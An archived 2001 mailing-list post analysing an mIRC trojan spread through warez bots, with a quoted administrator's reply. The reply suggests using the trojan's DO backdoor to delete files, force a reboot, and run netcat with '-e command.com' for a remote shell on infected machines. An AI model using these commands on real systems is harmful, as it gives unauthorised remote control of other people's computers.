It's not the DO command of mIRC, it's a built-in command; it's the equivalent of /QUOTE or /RAW in an IRC client. This sends the data directly to the server.

At this time I have found 2 directly infected files: Packet Handler Firewall and FlashFXP v1.0, both distributed on an XDCC bot on #warez950-dcc, in a zip file with some fake .nfo and a SETUP.EXE (oce.exe) of 354k. quicktools.ocx (EZFTP OLE Control Module) and Mswinsck.ocx are also included.

Another interesting thing: the server opens port 15150, and this is the prompt: "Enter your username:", probably an FTPD.

The trojan can also modify your mirc.ini (this adds auto-op) and modify your current script.

>
> With the DO command enabled, they gave us the means to remotely disable
> this trojan.
>
> Something to the effect of;
>
> msg <nick> .do del c:\windows\system\oce*.*
>
> Then, msg <nick> .do <some evil command to lock up the machine, forcing a
> reboot>.
> ...
>
> The mIRC DO command is very powerful, and can be used to install netcat on
> the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
> -p <any port> <your ip> -t -e command.com, giving a remote command prompt
> to investigate/disinfect the machine.
>
>
> ______________________________________________________________________________
> George Imburgia                          e-mail: gtiat_private
> Systems Administrator                    Phone:  (302)739-4068
> Delaware Technical & Community College   Fax:    (302)739-3345
> Office of the President                  Pager:  (302)741-5962

Samuel Cossette
clusterat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:39 PDT